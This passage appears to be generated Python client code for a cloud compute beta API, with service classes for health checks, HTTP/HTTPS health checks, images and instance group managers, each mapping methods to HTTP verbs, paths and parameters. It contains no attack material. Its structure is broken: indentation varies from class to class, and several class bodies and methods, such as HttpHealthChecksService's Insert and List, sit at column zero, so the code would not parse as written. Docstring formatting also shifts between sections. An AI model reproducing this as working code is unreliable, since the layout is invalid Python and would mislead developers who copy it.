        relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
        request_field=u'healthCheckResource',
        request_type_name=u'ComputeHealthChecksPatchRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def TestIamPermissions(self, request, global_params=None):
        """Return the permissions that the caller holds on the specified resource.

        Args:
            request: (ComputeHealthChecksTestIamPermissionsRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as a (TestPermissionsResponse) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('TestIamPermissions'), request,
            global_params=global_params)

    TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.healthChecks.testIamPermissions',
        ordered_params=[u'project', u'resource'],
        path_params=[u'project', u'resource'],
        query_params=[],
        relative_path=u'projects/{project}/global/healthChecks/{resource}/testIamPermissions',
        request_field=u'testPermissionsRequest',
        request_type_name=u'ComputeHealthChecksTestIamPermissionsRequest',
        response_type_name=u'TestPermissionsResponse',
        supports_download=False,
    )

    def Update(self, request, global_params=None):
        """Update a HealthCheck resource in the given project from the data carried in the request.

        Args:
            request: (ComputeHealthChecksUpdateRequest) the input request message.
            global_params: (StandardQueryParameters, default: None) global arguments.

        Returns:
            The response as an (Operation) message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Update'), request,
            global_params=global_params)

    Update.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'PUT',
        method_id=u'compute.healthChecks.update',
        ordered_params=[u'project', u'healthCheck'],
        path_params=[u'healthCheck', u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
        request_field=u'healthCheckResource',
        request_type_name=u'ComputeHealthChecksUpdateRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class HttpHealthChecksService(base_api.BaseApiService):
"""Service class for the httpHealthChecks resource."""
_NAME = u'httpHealthChecks'
def __init__(self, client):
    """Initialize the service with the shared API client."""
    super(ComputeBeta.HttpHealthChecksService, self).__init__(client)
    # This service declares no media-upload endpoints.
    self._upload_configs = {}
def Delete(self, request, global_params=None):
    """Delete the specified HttpHealthCheck resource.

    Args:
        request: (ComputeHttpHealthChecksDeleteRequest) the input request message.
        global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
        The response as an (Operation) message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Delete'), request,
        global_params=global_params)

Delete.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'DELETE',
    method_id=u'compute.httpHealthChecks.delete',
    ordered_params=[u'project', u'httpHealthCheck'],
    path_params=[u'httpHealthCheck', u'project'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
    request_field='',
    request_type_name=u'ComputeHttpHealthChecksDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Get(self, request, global_params=None):
    """Return the specified HttpHealthCheck resource. A list of available HTTP health checks can be obtained with a list() request.

    Args:
        request: (ComputeHttpHealthChecksGetRequest) the input request message.
        global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
        The response as a (HttpHealthCheck) message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Get'), request,
        global_params=global_params)

Get.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'GET',
    method_id=u'compute.httpHealthChecks.get',
    ordered_params=[u'project', u'httpHealthCheck'],
    path_params=[u'httpHealthCheck', u'project'],
    query_params=[],
    relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
    request_field='',
    request_type_name=u'ComputeHttpHealthChecksGetRequest',
    response_type_name=u'HttpHealthCheck',
    supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a HttpHealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHttpHealthChecksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.httpHealthChecks.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/httpHealthChecks',
request_field=u'httpHealthCheck',
request_type_name=u'ComputeHttpHealthChecksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of HttpHealthCheck resources available to the specified project.
Args:
request: (ComputeHttpHealthChecksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(HttpHealthCheckList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.httpHealthChecks.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/httpHealthChecks',
request_field='',
request_type_name=u'ComputeHttpHealthChecksListRequest',
response_type_name=u'HttpHealthCheckList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a HttpHealthCheck resource in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeHttpHealthChecksPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.httpHealthChecks.patch',
ordered_params=[u'project', u'httpHealthCheck'],
path_params=[u'httpHealthCheck', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
request_field=u'httpHealthCheckResource',
request_type_name=u'ComputeHttpHealthChecksPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeHttpHealthChecksTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.httpHealthChecks.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/httpHealthChecks/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeHttpHealthChecksTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates a HttpHealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHttpHealthChecksUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.httpHealthChecks.update',
ordered_params=[u'project', u'httpHealthCheck'],
path_params=[u'httpHealthCheck', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
request_field=u'httpHealthCheckResource',
request_type_name=u'ComputeHttpHealthChecksUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class HttpsHealthChecksService(base_api.BaseApiService):
  """Wraps the methods of the httpsHealthChecks API collection."""

  _NAME = u'httpsHealthChecks'

  def __init__(self, client):
    super(ComputeBeta.HttpsHealthChecksService, self).__init__(client)
    # No media-upload methods exist on this collection.
    self._upload_configs = {
        }

  def Delete(self, request, global_params=None):
    """Delete the HttpsHealthCheck resource named in the request.

    Args:
      request: (ComputeHttpsHealthChecksDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Delete'), request,
        global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.httpsHealthChecks.delete',
      http_method=u'DELETE',
      relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
      ordered_params=[u'project', u'httpsHealthCheck'],
      path_params=[u'httpsHealthCheck', u'project'],
      query_params=[u'requestId'],
      request_field='',
      request_type_name=u'ComputeHttpsHealthChecksDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Fetch the named HttpsHealthCheck resource. A list of available HTTPS health checks can be obtained with a list() request.

    Args:
      request: (ComputeHttpsHealthChecksGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (HttpsHealthCheck) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Get'), request,
        global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.httpsHealthChecks.get',
      http_method=u'GET',
      relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
      ordered_params=[u'project', u'httpsHealthCheck'],
      path_params=[u'httpsHealthCheck', u'project'],
      query_params=[],
      request_field='',
      request_type_name=u'ComputeHttpsHealthChecksGetRequest',
      response_type_name=u'HttpsHealthCheck',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Create an HttpsHealthCheck resource in the given project from the request body.

    Args:
      request: (ComputeHttpsHealthChecksInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Insert'), request,
        global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.httpsHealthChecks.insert',
      http_method=u'POST',
      relative_path=u'projects/{project}/global/httpsHealthChecks',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'requestId'],
      request_field=u'httpsHealthCheck',
      request_type_name=u'ComputeHttpsHealthChecksInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """List the HttpsHealthCheck resources available to the given project.

    Args:
      request: (ComputeHttpsHealthChecksListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (HttpsHealthCheckList) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('List'), request,
        global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.httpsHealthChecks.list',
      http_method=u'GET',
      relative_path=u'projects/{project}/global/httpsHealthChecks',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      request_field='',
      request_type_name=u'ComputeHttpsHealthChecksListRequest',
      response_type_name=u'HttpsHealthCheckList',
      supports_download=False,
  )

  def Patch(self, request, global_params=None):
    """Update an HttpsHealthCheck resource in the given project from the request body, using PATCH semantics (JSON merge patch format and processing rules).

    Args:
      request: (ComputeHttpsHealthChecksPatchRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Patch'), request,
        global_params=global_params)

  Patch.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.httpsHealthChecks.patch',
      http_method=u'PATCH',
      relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
      ordered_params=[u'project', u'httpsHealthCheck'],
      path_params=[u'httpsHealthCheck', u'project'],
      query_params=[u'requestId'],
      request_field=u'httpsHealthCheckResource',
      request_type_name=u'ComputeHttpsHealthChecksPatchRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Report which of the requested permissions the caller holds on the given resource.

    Args:
      request: (ComputeHttpsHealthChecksTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TestPermissionsResponse) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('TestIamPermissions'), request,
        global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.httpsHealthChecks.testIamPermissions',
      http_method=u'POST',
      relative_path=u'projects/{project}/global/httpsHealthChecks/{resource}/testIamPermissions',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeHttpsHealthChecksTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )

  def Update(self, request, global_params=None):
    """Replace an HttpsHealthCheck resource in the given project with the data in the request body.

    Args:
      request: (ComputeHttpsHealthChecksUpdateRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Update'), request,
        global_params=global_params)

  Update.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.httpsHealthChecks.update',
      http_method=u'PUT',
      relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
      ordered_params=[u'project', u'httpsHealthCheck'],
      path_params=[u'httpsHealthCheck', u'project'],
      query_params=[u'requestId'],
      request_field=u'httpsHealthCheckResource',
      request_type_name=u'ComputeHttpsHealthChecksUpdateRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )
class ImagesService(base_api.BaseApiService):
  """Wraps the methods of the images API collection."""

  _NAME = u'images'

  def __init__(self, client):
    super(ComputeBeta.ImagesService, self).__init__(client)
    # No media-upload methods exist on this collection.
    self._upload_configs = {
        }

  def Delete(self, request, global_params=None):
    """Delete the image named in the request.

    Args:
      request: (ComputeImagesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Delete'), request,
        global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.images.delete',
      http_method=u'DELETE',
      relative_path=u'projects/{project}/global/images/{image}',
      ordered_params=[u'project', u'image'],
      path_params=[u'image', u'project'],
      query_params=[u'requestId'],
      request_field='',
      request_type_name=u'ComputeImagesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Deprecate(self, request, global_params=None):
    """Set the deprecation status of an image.

    An empty request body clears the deprecation status instead.

    Args:
      request: (ComputeImagesDeprecateRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Deprecate'), request,
        global_params=global_params)

  Deprecate.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.images.deprecate',
      http_method=u'POST',
      relative_path=u'projects/{project}/global/images/{image}/deprecate',
      ordered_params=[u'project', u'image'],
      path_params=[u'image', u'project'],
      query_params=[u'requestId'],
      request_field=u'deprecationStatus',
      request_type_name=u'ComputeImagesDeprecateRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Fetch the named image. A list of available images can be obtained with a list() request.

    Args:
      request: (ComputeImagesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Image) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Get'), request,
        global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.images.get',
      http_method=u'GET',
      relative_path=u'projects/{project}/global/images/{image}',
      ordered_params=[u'project', u'image'],
      path_params=[u'image', u'project'],
      query_params=[],
      request_field='',
      request_type_name=u'ComputeImagesGetRequest',
      response_type_name=u'Image',
      supports_download=False,
  )

  def GetFromFamily(self, request, global_params=None):
    """Fetch the latest non-deprecated image belonging to an image family.

    Args:
      request: (ComputeImagesGetFromFamilyRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Image) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('GetFromFamily'), request,
        global_params=global_params)

  GetFromFamily.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.images.getFromFamily',
      http_method=u'GET',
      relative_path=u'projects/{project}/global/images/family/{family}',
      ordered_params=[u'project', u'family'],
      path_params=[u'family', u'project'],
      query_params=[],
      request_field='',
      request_type_name=u'ComputeImagesGetFromFamilyRequest',
      response_type_name=u'Image',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Create an image in the given project from the request body.

    Args:
      request: (ComputeImagesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Insert'), request,
        global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.images.insert',
      http_method=u'POST',
      relative_path=u'projects/{project}/global/images',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'forceCreate', u'requestId'],
      request_field=u'image',
      request_type_name=u'ComputeImagesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """List the custom images available to the given project.

    Custom images are images you create that belong to your project. This
    method does not return images that belong to other projects, including
    publicly-available images such as Debian 8. To list publicly-available
    images, issue this request against the respective image project, such as
    debian-cloud or windows-cloud.

    Args:
      request: (ComputeImagesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (ImageList) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('List'), request,
        global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.images.list',
      http_method=u'GET',
      relative_path=u'projects/{project}/global/images',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      request_field='',
      request_type_name=u'ComputeImagesListRequest',
      response_type_name=u'ImageList',
      supports_download=False,
  )

  def SetLabels(self, request, global_params=None):
    """Set the labels on an image. See the Labeling Resources documentation for details.

    Args:
      request: (ComputeImagesSetLabelsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('SetLabels'), request,
        global_params=global_params)

  SetLabels.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.images.setLabels',
      http_method=u'POST',
      relative_path=u'projects/{project}/global/images/{resource}/setLabels',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      request_field=u'globalSetLabelsRequest',
      request_type_name=u'ComputeImagesSetLabelsRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Report which of the requested permissions the caller holds on the given resource.

    Args:
      request: (ComputeImagesTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TestPermissionsResponse) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('TestIamPermissions'), request,
        global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      method_id=u'compute.images.testIamPermissions',
      http_method=u'POST',
      relative_path=u'projects/{project}/global/images/{resource}/testIamPermissions',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeImagesTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class InstanceGroupManagersService(base_api.BaseApiService):
"""Service class for the instanceGroupManagers resource."""
_NAME = u'instanceGroupManagers'
def __init__(self, client):
    super(ComputeBeta.InstanceGroupManagersService, self).__init__(client)
    # No media-upload methods exist on this collection.
    self._upload_configs = {
        }
def AbandonInstances(self, request, global_params=None):
    """Schedule removal of the given instances from the managed instance group.

    Abandoning an instance does not delete it, but it does remove the
    instance from any target pools applied by the group, and reduces the
    group's targetSize by the number of instances abandoned. The returned
    operation is DONE once the action is scheduled, even before the
    instances are removed; verify the abandoning action separately with the
    listmanagedinstances method. If the group backs a service with
    connection draining enabled, removal may take up to 60 seconds after
    the draining duration elapses. At most 1000 instances per request.

    Args:
      request: (ComputeInstanceGroupManagersAbandonInstancesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('AbandonInstances'), request,
        global_params=global_params)

AbandonInstances.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.abandonInstances',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/abandonInstances',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[u'requestId'],
    request_field=u'instanceGroupManagersAbandonInstancesRequest',
    request_type_name=u'ComputeInstanceGroupManagersAbandonInstancesRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def AggregatedList(self, request, global_params=None):
    """List the project's managed instance groups, grouped by zone.

    Args:
      request: (ComputeInstanceGroupManagersAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (InstanceGroupManagerAggregatedList) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('AggregatedList'), request,
        global_params=global_params)

AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.aggregatedList',
    http_method=u'GET',
    relative_path=u'projects/{project}/aggregated/instanceGroupManagers',
    ordered_params=[u'project'],
    path_params=[u'project'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    request_field='',
    request_type_name=u'ComputeInstanceGroupManagersAggregatedListRequest',
    response_type_name=u'InstanceGroupManagerAggregatedList',
    supports_download=False,
)
def Delete(self, request, global_params=None):
    """Delete the named managed instance group and every instance in it.

    The instance group must not belong to a backend service. Read Deleting
    an instance group for more information.

    Args:
      request: (ComputeInstanceGroupManagersDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Delete'), request,
        global_params=global_params)

Delete.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.delete',
    http_method=u'DELETE',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[u'requestId'],
    request_field='',
    request_type_name=u'ComputeInstanceGroupManagersDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def DeleteInstances(self, request, global_params=None):
    """Schedule deletion of the given instances in the managed instance group.

    The instances are also removed from any target pools they belong to,
    and the group's targetSize is reduced by the number of instances
    deleted. The returned operation is DONE once the action is scheduled,
    even while instances are still being deleted; verify the deleting
    action separately with the listmanagedinstances method. If the group
    backs a service with connection draining enabled, removal may take up
    to 60 seconds after the draining duration elapses. At most 1000
    instances per request.

    Args:
      request: (ComputeInstanceGroupManagersDeleteInstancesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('DeleteInstances'), request,
        global_params=global_params)

DeleteInstances.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.deleteInstances',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/deleteInstances',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[u'requestId'],
    request_field=u'instanceGroupManagersDeleteInstancesRequest',
    request_type_name=u'ComputeInstanceGroupManagersDeleteInstancesRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Get(self, request, global_params=None):
    """Fetch all details of the named managed instance group. A list of available groups can be obtained with a list() request.

    Args:
      request: (ComputeInstanceGroupManagersGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (InstanceGroupManager) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Get'), request,
        global_params=global_params)

Get.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.get',
    http_method=u'GET',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[],
    request_field='',
    request_type_name=u'ComputeInstanceGroupManagersGetRequest',
    response_type_name=u'InstanceGroupManager',
    supports_download=False,
)
def Insert(self, request, global_params=None):
    """Create a managed instance group from the information in the request.

    After the group is created, an action is scheduled to create its
    instances from the specified instance template. The returned operation
    is DONE once the group is created, even before its instances exist;
    verify the individual instances separately with the
    listmanagedinstances method. A managed instance group can have up to
    1000 VM instances per group; contact Cloud Support for a limit
    increase.

    Args:
      request: (ComputeInstanceGroupManagersInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Insert'), request,
        global_params=global_params)

Insert.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.insert',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers',
    ordered_params=[u'project', u'zone'],
    path_params=[u'project', u'zone'],
    query_params=[u'requestId'],
    request_field=u'instanceGroupManager',
    request_type_name=u'ComputeInstanceGroupManagersInsertRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def List(self, request, global_params=None):
    """List the managed instance groups contained in the given project and zone.

    Args:
      request: (ComputeInstanceGroupManagersListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (InstanceGroupManagerList) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('List'), request,
        global_params=global_params)

List.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.list',
    http_method=u'GET',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers',
    ordered_params=[u'project', u'zone'],
    path_params=[u'project', u'zone'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    request_field='',
    request_type_name=u'ComputeInstanceGroupManagersListRequest',
    response_type_name=u'InstanceGroupManagerList',
    supports_download=False,
)
def ListManagedInstances(self, request, global_params=None):
    """List every instance in the managed instance group.

    Each listed instance carries a currentAction indicating what the group
    is doing with it (for example CREATING while the instance is still
    being created); if a previous action failed, the list shows the errors
    for that failed action.

    Args:
      request: (ComputeInstanceGroupManagersListManagedInstancesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (InstanceGroupManagersListManagedInstancesResponse) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('ListManagedInstances'), request,
        global_params=global_params)

ListManagedInstances.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.listManagedInstances',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/listManagedInstances',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    # NOTE(review): the snake_case u'order_by' (unlike u'orderBy' used by the
    # other list methods) mirrors the generated discovery document for this
    # particular API method — do not "fix" it without checking the API surface.
    query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
    request_field='',
    request_type_name=u'ComputeInstanceGroupManagersListManagedInstancesRequest',
    response_type_name=u'InstanceGroupManagersListManagedInstancesResponse',
    supports_download=False,
)
def Patch(self, request, global_params=None):
    """Update a managed instance group from the information in the request.

    The returned operation is DONE once the group is patched, even while
    its instances are still being patched; verify the individual instances
    separately with the listManagedInstances method. Uses PATCH semantics
    (JSON merge patch format and processing rules).

    Args:
      request: (ComputeInstanceGroupManagersPatchRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Patch'), request,
        global_params=global_params)

Patch.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.patch',
    http_method=u'PATCH',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[u'requestId'],
    request_field=u'instanceGroupManagerResource',
    request_type_name=u'ComputeInstanceGroupManagersPatchRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def RecreateInstances(self, request, global_params=None):
    """Schedule recreation of the given instances in the managed instance group.

    The instances are deleted, then recreated from the group's current
    instance template. The returned operation is DONE once the action is
    scheduled, even before the instances are recreated; verify the
    recreating action separately with the listmanagedinstances method. If
    the group backs a service with connection draining enabled, removal may
    take up to 60 seconds after the draining duration elapses. At most 1000
    instances per request.

    Args:
      request: (ComputeInstanceGroupManagersRecreateInstancesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('RecreateInstances'), request,
        global_params=global_params)

RecreateInstances.method_config = lambda: base_api.ApiMethodInfo(
    method_id=u'compute.instanceGroupManagers.recreateInstances',
    http_method=u'POST',
    relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/recreateInstances',
    ordered_params=[u'project', u'zone', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'zone'],
    query_params=[u'requestId'],
    request_field=u'instanceGroupManagersRecreateInstancesRequest',
    request_type_name=u'ComputeInstanceGroupManagersRecreateInstancesRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Resize(self, request, global_params=None):
